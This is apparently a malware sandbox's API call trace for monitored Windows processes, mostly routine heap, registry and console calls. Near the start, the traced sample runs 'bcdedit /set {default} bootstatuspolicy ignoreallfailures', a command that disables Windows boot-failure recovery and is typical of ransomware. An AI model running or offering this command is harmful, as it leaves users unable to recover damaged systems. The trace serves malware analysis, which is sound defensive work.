(lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.898] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x16f3d0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f380 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x16f380*(hProcess=0x58, hThread=0x54, dwProcessId=0x5a4, dwThreadId=0x61c)) returned 1 [0203.464] CloseHandle (hObject=0x54) returned 1 [0203.464] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.464] GetProcessHeap () returned 0x170000 [0203.464] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x193160 | out: hHeap=0x170000) returned 1 [0203.464] GetEnvironmentStringsW () returned 0x193160* [0203.464] GetProcessHeap () returned 0x170000 [0203.464] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xac4) returned 0x199c50 [0203.464] FreeEnvironmentStringsW (penv=0x193160) returned 1 [0203.464] GetProcessHeap () returned 0x170000 [0203.464] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1906f0 | out: hHeap=0x170000) returned 1 [0203.464] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f398 | out: lpAttributeList=0x16f398) [0203.464] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0203.465] _close (_FileHandle=4) returned 0 [0203.465] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0203.509] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x16f8b8 | out: lpExitCode=0x16f8b8*=0x0) returned 1 [0203.509] CloseHandle (hObject=0x60) returned 1 [0203.509] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0204.322] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x16f8b8 | out: lpExitCode=0x16f8b8*=0x0) returned 1 [0204.322] CloseHandle (hObject=0x58) returned 1 [0204.322] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.322] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.322] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.322] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 1 [0204.323] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.323] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0204.323] SetConsoleInputExeNameW () returned 0x1 [0204.323] GetConsoleOutputCP () returned 0x1b5 [0204.323] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0204.323] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0204.324] exit (_Code=0) Process: id = "20" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x67597000" os_pid = "0x4ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x73c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" title 5886623\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 158 os_tid = 0x4d8 [0203.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef790 | out: lpSystemTimeAsFileTime=0x1ef790*(dwLowDateTime=0x1d824f00, dwHighDateTime=0x1d661be)) [0203.069] GetCurrentProcessId () returned 0x4ec [0203.069] GetCurrentThreadId () returned 0x4d8 [0203.070] GetTickCount () returned 0x113e753 [0203.070] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef798 | out: lpPerformanceCount=0x1ef798*=13356539857) returned 1 [0203.074] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab50000 [0203.468] __set_app_type (_Type=0x1) [0203.468] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab77810) returned 0x0 [0203.468] __getmainargs (in: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610, _DoWildCard=0, _StartInfo=0x4ab7e0f4 | out: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610) returned 0 [0203.469] GetCurrentThreadId () returned 0x4d8 [0203.469] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4d8) returned 0x38 [0203.469] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0203.469] GetProcAddress (hModule=0x76f60000, lpProcName="SetThreadUILanguage") returned 0x76f76d40 [0203.469] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.469] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.469] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef728 | out: phkResult=0x1ef728*=0x0) returned 0x2 [0203.469] VirtualQuery (in: lpAddress=0x1ef710, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.470] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.470] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.470] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.470] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.470] GetConsoleOutputCP () returned 0x1b5 [0203.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.470] SetConsoleCtrlHandler (HandlerRoutine=0x4ab73184, Add=1) returned 1 [0203.470] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.470] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0203.470] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.470] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 0 [0203.471] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.471] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0203.471] GetEnvironmentStringsW () returned 0x218b10* [0203.471] GetProcessHeap () returned 0x200000 [0203.471] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xac4) returned 0x2195e0 [0203.471] FreeEnvironmentStringsW (penv=0x218b10) returned 1 [0203.471] GetProcessHeap () returned 0x200000 [0203.471] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x8) returned 0x218390 [0203.471] GetEnvironmentStringsW () returned 0x218b10* [0203.471] GetProcessHeap () returned 0x200000 [0203.471] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xac4) returned 0x21a0b0 [0203.471] FreeEnvironmentStringsW (penv=0x218b10) returned 1 [0203.471] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x40) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x18, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0203.472] RegCloseKey (hKey=0x40) returned 0x0 [0203.472] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x40) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0203.472] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0203.472] RegCloseKey (hKey=0x40) returned 0x0 [0203.472] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae1a6 [0203.472] srand (_Seed=0x5f1ae1a6) [0203.472] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 5886623\"" [0203.472] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 5886623\"" [0203.473] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.473] GetProcessHeap () returned 0x200000 [0203.473] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x218) returned 0x21ab80 [0203.473] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x21ab90, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0203.473] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.473] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0203.473] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.473] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.473] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.473] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.473] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.473] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.473] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.473] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.473] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.473] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.473] GetProcessHeap () returned 0x200000 [0203.474] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38) returned 0x216570 [0203.474] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef3f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1ef3d0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef3d0*="system32") returned 0x13 [0203.474] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0203.474] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xad0000ad, cFileName="Windows", cAlternateFileName="")) returned 0x218970 [0203.474] FindClose (in: hFindFile=0x218970 | out: hFindFile=0x218970) returned 1 [0203.474] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xad0000ad, cFileName="System32", cAlternateFileName="")) returned 0x218970 [0203.474] FindClose (in: hFindFile=0x218970 | out: hFindFile=0x218970) returned 1 [0203.474] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0203.474] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0203.474] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0203.474] GetProcessHeap () returned 0x200000 [0203.474] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2195e0 | out: hHeap=0x200000) returned 1 [0203.474] GetEnvironmentStringsW () returned 0x218b10* [0203.474] GetProcessHeap () returned 0x200000 [0203.474] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xac4) returned 0x2195e0 [0203.474] FreeEnvironmentStringsW (penv=0x218b10) returned 1 [0203.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.475] GetProcessHeap () returned 0x200000 [0203.475] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216570 | out: hHeap=0x200000) returned 1 [0203.475] GetProcessHeap () returned 0x200000 [0203.475] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4016) returned 0x21ada0 [0203.475] GetProcessHeap () returned 0x200000 [0203.475] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x34) returned 0x216570 [0203.475] GetProcessHeap () returned 0x200000 [0203.475] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21ada0 | out: hHeap=0x200000) returned 1 [0203.475] GetConsoleOutputCP () returned 0x1b5 [0203.476] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.476] GetUserDefaultLCID () returned 0x409 [0203.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab87b50, cchData=8 | out: lpLCData=":") returned 2 [0203.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0203.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0203.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef500, cchData=128 | out: lpLCData="1") returned 2 [0203.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab9a740, cchData=8 | out: lpLCData="/") returned 2 [0203.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0203.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0203.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0203.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0203.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0203.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0203.477] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab87b40, cchData=8 | out: lpLCData=".") returned 2 [0203.477] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0203.477] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.478] GetProcessHeap () returned 0x200000 [0203.478] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x20c) returned 0x218b80 [0203.478] GetConsoleTitleW (in: lpConsoleTitle=0x218b80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.478] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0203.478] GetProcAddress (hModule=0x76f60000, lpProcName="CopyFileExW") returned 0x76f723d0 [0203.478] GetProcAddress (hModule=0x76f60000, lpProcName="IsDebuggerPresent") returned 0x76f68290 [0203.478] GetProcAddress (hModule=0x76f60000, lpProcName="SetConsoleInputExeNameW") returned 0x76f717e0 [0203.478] GetProcessHeap () returned 0x200000 [0203.478] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x21ada0 [0203.478] GetProcessHeap () returned 0x200000 [0203.478] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21ada0 | out: hHeap=0x200000) returned 1 [0203.479] _wcsicmp (_String1="title", _String2=")") returned 75 [0203.479] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0203.479] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0203.479] _wcsicmp (_String1="IF", _String2="title") returned -11 [0203.479] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0203.479] _wcsicmp (_String1="REM", _String2="title") returned -2 [0203.479] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0203.479] GetProcessHeap () returned 0x200000 [0203.479] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x218da0 [0203.479] GetProcessHeap () returned 0x200000 [0203.480] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1c) returned 0x214630 [0203.480] GetProcessHeap () returned 0x200000 [0203.480] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x22) returned 0x214660 [0203.481] GetConsoleTitleW (in: lpConsoleTitle=0x1ef410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.481] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0203.481] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0203.481] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0203.481] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0203.481] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0203.481] _wcsicmp (_String1="title", _String2="CD") returned 17 [0203.481] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0203.481] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0203.481] _wcsicmp (_String1="title", _String2="REN") returned 2 [0203.481] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0203.481] _wcsicmp (_String1="title", _String2="SET") returned 1 [0203.481] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0203.481] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0203.481] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0203.481] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0203.482] _wcsicmp (_String1="title", _String2="MD") returned 7 [0203.482] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0203.482] _wcsicmp (_String1="title", _String2="RD") returned 2 [0203.482] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0203.482] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0203.482] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0203.482] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0203.482] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0203.482] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0203.482] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0203.482] _wcsicmp (_String1="title", _String2="VER") returned -2 [0203.482] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0203.482] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0203.482] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0203.482] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0203.482] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0203.482] GetProcessHeap () returned 0x200000 [0203.482] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x34) returned 0x2165f0 [0203.483] GetProcessHeap () returned 0x200000 [0203.483] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x2165f0, Size=0x22) returned 0x214690 [0203.483] GetProcessHeap () returned 0x200000 [0203.483] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x214690) returned 0x22 [0203.483] GetProcessHeap () returned 0x200000 [0203.483] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x2e) returned 0x2165f0 [0203.483] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x1eef50 | out: TokenHandle=0x1eef50*=0x0) returned 0xc000007c [0203.483] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1eef50 | out: TokenHandle=0x1eef50*=0x4c) returned 0x0 [0203.483] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x12, TokenInformation=0x1eef60, TokenInformationLength=0x4, ReturnLength=0x1eef68 | out: TokenInformation=0x1eef60, ReturnLength=0x1eef68) returned 0x0 [0203.483] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x1a, TokenInformation=0x1eef68, TokenInformationLength=0x4, ReturnLength=0x1eef60 | out: TokenInformation=0x1eef68, ReturnLength=0x1eef60) returned 0x0 [0203.483] NtClose (Handle=0x4c) returned 0x0 [0203.483] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x1eef30, nSize=0x0, Arguments=0x1eef38 | out: lpBuffer="蹠!") returned 0xf [0203.483] GetProcessHeap () returned 0x200000 [0203.484] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x218) returned 0x218e90 [0203.484] SetConsoleTitleW (lpConsoleTitle="Administrator: 5886623") returned 1 [0203.484] GetProcessHeap () returned 0x200000 [0203.485] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218e90 | out: hHeap=0x200000) returned 1 [0203.485] LocalFree (hMem=0x218e60) returned 0x0 [0203.485] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.485] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0203.485] 